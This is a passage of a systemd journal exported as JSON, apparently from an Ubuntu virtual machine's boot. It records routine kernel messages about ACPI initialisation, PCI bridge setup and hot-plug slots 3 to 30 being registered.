"_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "172025", "MESSAGE" : "ACPI: Added _OSI(Linux-Dell-Video)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c4;b=e2b08827b5804427b422c10c84f1567e;m=558a36;t=5bd16dd19099d;x=5a5ce85035bec8c6", "__REALTIME_TIMESTAMP" : "1615280779889053", "__MONOTONIC_TIMESTAMP" : "5605942", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "174297", "MESSAGE" : "ACPI: Added _OSI(Linux-Lenovo-NV-HDMI-Audio)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c5;b=e2b08827b5804427b422c10c84f1567e;m=558a3f;t=5bd16dd1909a7;x=78b88b41e32ef81d", "__REALTIME_TIMESTAMP" : "1615280779889063", "__MONOTONIC_TIMESTAMP" : "5605951", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "176006", "MESSAGE" : "ACPI: Added _OSI(Linux-HPI-Hybrid-Graphics)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c6;b=e2b08827b5804427b422c10c84f1567e;m=558a49;t=5bd16dd1909b0;x=4c34a64f8e5323fc", "__REALTIME_TIMESTAMP" : "1615280779889072", "__MONOTONIC_TIMESTAMP" : "5605961", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "180214", "MESSAGE" : "ACPI: Interpreter enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c7;b=e2b08827b5804427b422c10c84f1567e;m=558a52;t=5bd16dd1909b9;x=e77bf36f1551ba03", "__REALTIME_TIMESTAMP" : "1615280779889081", "__MONOTONIC_TIMESTAMP" : 
"5605970", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "182170", "MESSAGE" : "ACPI: (supports S0 S3 S4 S5)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c8;b=e2b08827b5804427b422c10c84f1567e;m=558a5b;t=5bd16dd1909c3;x=152e79affa7fa7a5", "__REALTIME_TIMESTAMP" : "1615280779889091", "__MONOTONIC_TIMESTAMP" : "5605979", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "184006", "MESSAGE" : "ACPI: Using IOAPIC for interrupt routing" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c9;b=e2b08827b5804427b422c10c84f1567e;m=558a68;t=5bd16dd1909d0;x=2583037f251faa36", "__REALTIME_TIMESTAMP" : "1615280779889104", "__MONOTONIC_TIMESTAMP" : "5605992", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "186729", "MESSAGE" : "PCI: Using host bridge windows from ACPI; if necessary, use \"pci=nocrs\" and report a bug" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ca;b=e2b08827b5804427b422c10c84f1567e;m=558a75;t=5bd16dd1909dc;x=558fb4a2dc4e9103", "__REALTIME_TIMESTAMP" : "1615280779889116", "__MONOTONIC_TIMESTAMP" : "5606005", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "188219", "MESSAGE" : "ACPI: Enabled 2 GPEs in block 00 to 0F" } 
{ "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=cb;b=e2b08827b5804427b422c10c84f1567e;m=558a7f;t=5bd16dd1909e6;x=614576160dde48d8", "__REALTIME_TIMESTAMP" : "1615280779889126", "__MONOTONIC_TIMESTAMP" : "5606015", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "194082", "MESSAGE" : "ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-ff])" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=cc;b=e2b08827b5804427b422c10c84f1567e;m=558b38;t=5bd16dd190aa0;x=ec4fc644a915985a", "__REALTIME_TIMESTAMP" : "1615280779889312", "__MONOTONIC_TIMESTAMP" : "5606200", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "acpi", "_KERNEL_DEVICE" : "+acpi:PNP0A03:00", "_UDEV_SYSNAME" : "PNP0A03:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "196011", "MESSAGE" : "acpi PNP0A03:00: _OSC: OS supports [ASPM ClockPM Segments MSI]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=cd;b=e2b08827b5804427b422c10c84f1567e;m=558bc0;t=5bd16dd190b27;x=86ceb47bb867c586", "__REALTIME_TIMESTAMP" : "1615280779889447", "__MONOTONIC_TIMESTAMP" : "5606336", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "acpi", "_KERNEL_DEVICE" : "+acpi:PNP0A03:00", "_UDEV_SYSNAME" : "PNP0A03:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "199398", "MESSAGE" : "acpi PNP0A03:00: _OSC failed (AE_NOT_FOUND); disabling ASPM" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ce;b=e2b08827b5804427b422c10c84f1567e;m=558c63;t=5bd16dd190bca;x=8006e9f582bdcfc5", "__REALTIME_TIMESTAMP" : "1615280779889610", "__MONOTONIC_TIMESTAMP" : "5606499", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_KERNEL_SUBSYSTEM" : "acpi", "_KERNEL_DEVICE" : "+acpi:PNP0A03:00", "_UDEV_SYSNAME" : "PNP0A03:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "200016", "PRIORITY" : "4", "MESSAGE" : "acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=cf;b=e2b08827b5804427b422c10c84f1567e;m=558c81;t=5bd16dd190be8;x=e4630d4082cec94f", "__REALTIME_TIMESTAMP" : "1615280779889640", "__MONOTONIC_TIMESTAMP" : "5606529", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "204440", "MESSAGE" : "acpiphp: Slot [3] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d0;b=e2b08827b5804427b422c10c84f1567e;m=558c8c;t=5bd16dd190bf3;x=74d43fcd51b8a32a", "__REALTIME_TIMESTAMP" : "1615280779889651", "__MONOTONIC_TIMESTAMP" : "5606540", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "206960", "MESSAGE" : "acpiphp: Slot [4] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d1;b=e2b08827b5804427b422c10c84f1567e;m=558c9a;t=5bd16dd190c01;x=c9ee9d4ba2345155", "__REALTIME_TIMESTAMP" : "1615280779889665", "__MONOTONIC_TIMESTAMP" : "5606554", "_BOOT_ID" : 
"e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "208060", "MESSAGE" : "acpiphp: Slot [5] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d2;b=e2b08827b5804427b422c10c84f1567e;m=558ca4;t=5bd16dd190c0c;x=290a75fec63580", "__REALTIME_TIMESTAMP" : "1615280779889676", "__MONOTONIC_TIMESTAMP" : "5606564", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "210320", "MESSAGE" : "acpiphp: Slot [6] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d3;b=e2b08827b5804427b422c10c84f1567e;m=558caf;t=5bd16dd190c16;x=b757a1b1a9814433", "__REALTIME_TIMESTAMP" : "1615280779889686", "__MONOTONIC_TIMESTAMP" : "5606575", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "212068", "MESSAGE" : "acpiphp: Slot [7] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d4;b=e2b08827b5804427b422c10c84f1567e;m=558cb9;t=5bd16dd190c20;x=371cfb0a26cb473a", "__REALTIME_TIMESTAMP" : "1615280779889696", "__MONOTONIC_TIMESTAMP" : "5606585", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "214241", "MESSAGE" : "acpiphp: Slot [8] registered" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d5;b=e2b08827b5804427b422c10c84f1567e;m=558cc3;t=5bd16dd190c2a;x=d7cd86ed04f23905", "__REALTIME_TIMESTAMP" : "1615280779889706", "__MONOTONIC_TIMESTAMP" : "5606595", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "216075", "MESSAGE" : "acpiphp: Slot [9] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d6;b=e2b08827b5804427b422c10c84f1567e;m=558ccd;t=5bd16dd190c34;x=109ca8f7a7b8f084", "__REALTIME_TIMESTAMP" : "1615280779889716", "__MONOTONIC_TIMESTAMP" : "5606605", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "218093", "MESSAGE" : "acpiphp: Slot [10] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d7;b=e2b08827b5804427b422c10c84f1567e;m=558cd7;t=5bd16dd190c3f;x=254b2a4852bf3ab8", "__REALTIME_TIMESTAMP" : "1615280779889727", "__MONOTONIC_TIMESTAMP" : "5606615", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "220054", "MESSAGE" : "acpiphp: Slot [11] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d8;b=e2b08827b5804427b422c10c84f1567e;m=558ce5;t=5bd16dd190c4c;x=c2d4e9cbb43a1b58", "__REALTIME_TIMESTAMP" : "1615280779889740", "__MONOTONIC_TIMESTAMP" : "5606629", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : 
"ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "222142", "MESSAGE" : "acpiphp: Slot [12] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d9;b=e2b08827b5804427b422c10c84f1567e;m=558cef;t=5bd16dd190c57;x=edcbddafee92b0f", "__REALTIME_TIMESTAMP" : "1615280779889751", "__MONOTONIC_TIMESTAMP" : "5606639", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "224055", "MESSAGE" : "acpiphp: Slot [13] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=da;b=e2b08827b5804427b422c10c84f1567e;m=558cf9;t=5bd16dd190c61;x=ff342f0e7778618d", "__REALTIME_TIMESTAMP" : "1615280779889761", "__MONOTONIC_TIMESTAMP" : "5606649", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "226203", "MESSAGE" : "acpiphp: Slot [14] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=db;b=e2b08827b5804427b422c10c84f1567e;m=558d06;t=5bd16dd190c6e;x=c01dbd6857ee3cbd", "__REALTIME_TIMESTAMP" : "1615280779889774", "__MONOTONIC_TIMESTAMP" : "5606662", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "228056", "MESSAGE" : "acpiphp: Slot [15] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=dc;b=e2b08827b5804427b422c10c84f1567e;m=558d11;t=5bd16dd190c78;x=1cecf41a859e0d9a", "__REALTIME_TIMESTAMP" : "1615280779889784", "__MONOTONIC_TIMESTAMP" : "5606673", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : 
"kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "230194", "MESSAGE" : "acpiphp: Slot [16] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=dd;b=e2b08827b5804427b422c10c84f1567e;m=558d1b;t=5bd16dd190c83;x=6f4fd28d63c8a383", "__REALTIME_TIMESTAMP" : "1615280779889795", "__MONOTONIC_TIMESTAMP" : "5606683", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "232074", "MESSAGE" : "acpiphp: Slot [17] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=de;b=e2b08827b5804427b422c10c84f1567e;m=558d25;t=5bd16dd190c8d;x=92ce5d577915cc12", "__REALTIME_TIMESTAMP" : "1615280779889805", "__MONOTONIC_TIMESTAMP" : "5606693", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "234204", "MESSAGE" : "acpiphp: Slot [18] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=df;b=e2b08827b5804427b422c10c84f1567e;m=558d2f;t=5bd16dd190c97;x=eb1e4f71c91af795", "__REALTIME_TIMESTAMP" : "1615280779889815", "__MONOTONIC_TIMESTAMP" : "5606703", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "236052", "MESSAGE" : "acpiphp: Slot [19] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e0;b=e2b08827b5804427b422c10c84f1567e;m=558d3a;t=5bd16dd190ca1;x=acdf7eb7d06d831f", 
"__REALTIME_TIMESTAMP" : "1615280779889825", "__MONOTONIC_TIMESTAMP" : "5606714", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "238186", "MESSAGE" : "acpiphp: Slot [20] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e1;b=e2b08827b5804427b422c10c84f1567e;m=558d44;t=5bd16dd190cab;x=922cc8b31e4c0829", "__REALTIME_TIMESTAMP" : "1615280779889835", "__MONOTONIC_TIMESTAMP" : "5606724", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "240052", "MESSAGE" : "acpiphp: Slot [21] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e2;b=e2b08827b5804427b422c10c84f1567e;m=558d4e;t=5bd16dd190cb5;x=32612c6d0dba1840", "__REALTIME_TIMESTAMP" : "1615280779889845", "__MONOTONIC_TIMESTAMP" : "5606734", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "242203", "MESSAGE" : "acpiphp: Slot [22] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e3;b=e2b08827b5804427b422c10c84f1567e;m=558d6a;t=5bd16dd190cd2;x=aea19448686e6875", "__REALTIME_TIMESTAMP" : "1615280779889874", "__MONOTONIC_TIMESTAMP" : "5606762", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "244053", "MESSAGE" : "acpiphp: Slot [23] registered" } { 
"__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e4;b=e2b08827b5804427b422c10c84f1567e;m=558d83;t=5bd16dd190ceb;x=b59ff18ba9e88ffb", "__REALTIME_TIMESTAMP" : "1615280779889899", "__MONOTONIC_TIMESTAMP" : "5606787", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "246254", "MESSAGE" : "acpiphp: Slot [24] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e5;b=e2b08827b5804427b422c10c84f1567e;m=558d8f;t=5bd16dd190cf7;x=b1df68348006767", "__REALTIME_TIMESTAMP" : "1615280779889911", "__MONOTONIC_TIMESTAMP" : "5606799", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "248053", "MESSAGE" : "acpiphp: Slot [25] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e6;b=e2b08827b5804427b422c10c84f1567e;m=558d9a;t=5bd16dd190d01;x=4dcb9e0ec273830f", "__REALTIME_TIMESTAMP" : "1615280779889921", "__MONOTONIC_TIMESTAMP" : "5606810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "250238", "MESSAGE" : "acpiphp: Slot [26] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e7;b=e2b08827b5804427b422c10c84f1567e;m=558dab;t=5bd16dd190d13;x=31ac93d807cba66f", "__REALTIME_TIMESTAMP" : "1615280779889939", "__MONOTONIC_TIMESTAMP" : "5606827", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", 
"_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "252055", "MESSAGE" : "acpiphp: Slot [27] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e8;b=e2b08827b5804427b422c10c84f1567e;m=558dbc;t=5bd16dd190d24;x=ad184afb6e01a9f4", "__REALTIME_TIMESTAMP" : "1615280779889956", "__MONOTONIC_TIMESTAMP" : "5606844", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "254696", "MESSAGE" : "acpiphp: Slot [28] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e9;b=e2b08827b5804427b422c10c84f1567e;m=558dd7;t=5bd16dd190d3f;x=afe1777123395e10", "__REALTIME_TIMESTAMP" : "1615280779889983", "__MONOTONIC_TIMESTAMP" : "5606871", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "256061", "MESSAGE" : "acpiphp: Slot [29] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ea;b=e2b08827b5804427b422c10c84f1567e;m=558de1;t=5bd16dd190d48;x=3f915f30eba4e271", "__REALTIME_TIMESTAMP" : "1615280779889992", "__MONOTONIC_TIMESTAMP" : "5606881", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "258131", "MESSAGE" : "acpiphp: Slot [30] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=eb;b=e2b08827b5804427b422c10c84f1567e;m=558dfa;t=5bd16dd190d62;x=25bff900685e8418", "__REALTIME_TIMESTAMP" : "1615280779890018", "__MONOTONIC_TIMESTAMP" : "5606906", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", 
